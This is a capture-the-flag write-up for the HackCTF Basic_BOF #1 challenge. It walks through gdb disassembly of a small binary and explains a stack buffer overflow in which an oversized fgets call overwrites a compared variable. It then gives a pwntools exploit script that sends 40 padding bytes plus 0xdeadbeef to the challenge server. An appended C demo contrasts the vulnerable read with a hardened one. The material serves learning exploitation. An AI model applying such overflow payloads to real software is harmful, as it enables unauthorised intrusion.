Hackctf Basic_BOF#1 Write-up

c0wb3ll | 2019. 12. 10. 04:09

This is the Basic_BOF #1 challenge.

I downloaded the file and dropped it onto Kali.

  root@C0WB3LL:~/Desktop/pwn# gdb bof_basic 
  GNU gdb (Debian 8.3.1-1) 8.3.1
  Copyright (C) 2019 Free Software Foundation, Inc.
  License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
  This is free software: you are free to change and redistribute it.
  There is NO WARRANTY, to the extent permitted by law.
  Type "show copying" and "show warranty" for details.
  This GDB was configured as "x86_64-linux-gnu".
  Type "show configuration" for configuration details.
  For bug reporting instructions, please see:
  <http://www.gnu.org/software/gdb/bugs/>.
  Find the GDB manual and other documentation resources online at:
      <http://www.gnu.org/software/gdb/documentation/>.

  For help, type "help".
  Type "apropos word" to search for commands related to "word"...
  pwndbg: loaded 180 commands. Type pwndbg [filter] for a list.
  pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
  Reading symbols from bof_basic...
  (No debugging symbols found in bof_basic)
  pwndbg> 
  

I ran it through gdb right away.

  pwndbg> i fu
  All defined functions:

  Non-debugging symbols:
  0x08048330  _init
  0x08048370  printf@plt
  0x08048380  fgets@plt
  0x08048390  puts@plt
  0x080483a0  system@plt
  0x080483b0  __libc_start_main@plt
  0x080483c0  __gmon_start__@plt
  0x080483d0  _start
  0x08048400  __x86.get_pc_thunk.bx
  0x08048410  deregister_tm_clones
  0x08048440  register_tm_clones
  0x08048480  __do_global_dtors_aux
  0x080484a0  frame_dummy
  0x080484cb  main
  0x08048590  __libc_csu_init
  0x080485f0  __libc_csu_fini
  0x080485f4  _fini
  pwndbg> 
  

I check the function information with the i fu command. Nothing special here, so let's dig straight into the main function.

  pwndbg> disas main
  Dump of assembler code for function main:
     0x080484cb <+0>:     lea    ecx,[esp+0x4]
     0x080484cf <+4>:     and    esp,0xfffffff0
     0x080484d2 <+7>:     push   DWORD PTR [ecx-0x4]
     0x080484d5 <+10>:    push   ebp
     0x080484d6 <+11>:    mov    ebp,esp
     0x080484d8 <+13>:    push   ecx
     0x080484d9 <+14>:    sub    esp,0x34
     0x080484dc <+17>:    mov    DWORD PTR [ebp-0xc],0x4030201
     0x080484e3 <+24>:    mov    eax,ds:0x804a040
     0x080484e8 <+29>:    sub    esp,0x4
     0x080484eb <+32>:    push   eax
     0x080484ec <+33>:    push   0x2d
     0x080484ee <+35>:    lea    eax,[ebp-0x34]
     0x080484f1 <+38>:    push   eax
     0x080484f2 <+39>:    call   0x8048380 <fgets@plt>
     0x080484f7 <+44>:    add    esp,0x10
     0x080484fa <+47>:    sub    esp,0x8
     0x080484fd <+50>:    lea    eax,[ebp-0x34]
     0x08048500 <+53>:    push   eax
     0x08048501 <+54>:    push   0x8048610
     0x08048506 <+59>:    call   0x8048370 <printf@plt>
     0x0804850b <+64>:    add    esp,0x10
     0x0804850e <+67>:    sub    esp,0x8
     0x08048511 <+70>:    push   DWORD PTR [ebp-0xc]
     0x08048514 <+73>:    push   0x804861c
     0x08048519 <+78>:    call   0x8048370 <printf@plt>
     0x0804851e <+83>:    add    esp,0x10
     0x08048521 <+86>:    cmp    DWORD PTR [ebp-0xc],0x4030201
     0x08048528 <+93>:    je     0x8048543 <main+120>
     0x0804852a <+95>:    cmp    DWORD PTR [ebp-0xc],0xdeadbeef
     0x08048531 <+102>:   je     0x8048543 <main+120>
     0x08048533 <+104>:   sub    esp,0xc
     0x08048536 <+107>:   push   0x8048628
     0x0804853b <+112>:   call   0x8048390 <puts@plt>
     0x08048540 <+117>:   add    esp,0x10
     0x08048543 <+120>:   cmp    DWORD PTR [ebp-0xc],0xdeadbeef
     0x0804854a <+127>:   jne    0x804857c <main+177>
     0x0804854c <+129>:   sub    esp,0xc
     0x0804854f <+132>:   push   0x8048644
     0x08048554 <+137>:   call   0x8048390 <puts@plt>
     0x08048559 <+142>:   add    esp,0x10
     0x0804855c <+145>:   sub    esp,0xc
     0x0804855f <+148>:   push   0x804866e
     0x08048564 <+153>:   call   0x80483a0 <system@plt>
     0x08048569 <+158>:   add    esp,0x10
     0x0804856c <+161>:   sub    esp,0xc
     0x0804856f <+164>:   push   0x8048678
     0x08048574 <+169>:   call   0x8048390 <puts@plt>
     0x08048579 <+174>:   add    esp,0x10
     0x0804857c <+177>:   mov    eax,0x0
     0x08048581 <+182>:   mov    ecx,DWORD PTR [ebp-0x4]
     0x08048584 <+185>:   leave  
     0x08048585 <+186>:   lea    esp,[ecx-0x4]
     0x08048588 <+189>:   ret    
  End of assembler dump.
  pwndbg> 
  

To summarize briefly: the program compares the value at ebp-0xc (initialised to 0x4030201 at the top of main) with 0xdeadbeef and, if they are equal, calls system.

fgets reads the input into the buffer starting at ebp-0x34. 0x34 - 0xc = 0x28 = 40, so the buffer lies 40 bytes below the compared value, and the size argument passed to fgets is 0x2d (45), which lets it store up to 44 bytes, enough for the padding plus the 4-byte value.

So send 40 bytes of A and then overwrite the value with deadbeef.

Payload : "A"*40 + p32(deadbeef)

pwntools.py

  from pwn import *

  p = remote("ctf.j0n9hyun.xyz", 3000)

  # value that main compares [ebp-0xc] against before calling system()
  flag = 0xdeadbeef

  # 40 bytes of padding fill the fgets buffer from ebp-0x34 up to ebp-0xc,
  # then the 4-byte little-endian value overwrites the compared variable
  payload = b"A" * 40 + p32(flag)

  p.sendline(payload)

  p.interactive()
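The root cause is the size argument handed to fgets (0x2d, or 45) being larger than the 40 bytes available before the compared variable. The following C program is added here and is not part of the original write-up or the challenge binary: it models that frame layout as a struct (an assumption, since the real locals are laid out by the compiler), and shows that fgets with the binary's size overwrites the check value while fgets with the buffer's own size leaves it intact. The function names and the constructed input line are likewise assumed.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define BUF_LEN    40            /* 0x34 - 0xc = 0x28 bytes from buffer to check */
#define INIT_VALUE 0x04030201u   /* value main stores at ebp-0xc */
#define SAMPLE_LEN 45            /* 40 pad bytes + 4-byte value + newline */

/* Assumed model of the frame seen in the disassembly, not the challenge's source. */
struct frame {
    char buf[BUF_LEN];        /* fgets destination, ebp-0x34 in the binary */
    volatile uint32_t check;  /* compared with 0xdeadbeef, ebp-0xc in the binary */
    char pad[4];              /* room for the NUL fgets appends after 44 bytes */
};

/* Feed `input` through a FILE* as stdin would, call fgets with size n,
 * and return what the check value holds afterwards (0 on I/O failure). */
static uint32_t read_line(const char *input, size_t len, int n)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    f.check = INIT_VALUE;
    FILE *fp = tmpfile();
    if (fp == NULL || fwrite(input, 1, len, fp) != len)
        return 0;
    rewind(fp);
    /* A volatile pointer hides the buffer size from the compiler, so the
     * demo behaves the same with or without _FORTIFY_SOURCE. */
    char *volatile dst = f.buf;
    if (fgets(dst, n, fp) == NULL)
        f.check = 0;
    fclose(fp);
    return f.check;
}

/* The binary's call: size 0x2d (45) lets fgets store 44 bytes into a 40-byte buffer. */
uint32_t vulnerable_read(const char *input, size_t len) { return read_line(input, len, 0x2d); }
/* Hardened form: the size argument matches the buffer, so at most 39 bytes land in it. */
uint32_t hardened_read(const char *input, size_t len) { return read_line(input, len, BUF_LEN); }

/* Constructed line: 40 'A's, 0xdeadbeef in little-endian byte order (as on x86), newline. */
const char *sample_line(void)
{
    static char line[SAMPLE_LEN];
    memset(line, 'A', 40);
    memcpy(line + 40, "\xef\xbe\xad\xde", 4);
    line[44] = '\n';
    return line;
}
```

Compile with a C compiler on a little-endian machine; vulnerable_read returns 0xdeadbeef for the sample line and hardened_read returns the untouched 0x04030201.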

Flag : Not telling, heh. Everyone, go solve it yourselves~ (Not that it matters, since a Google search turns it up anyway.)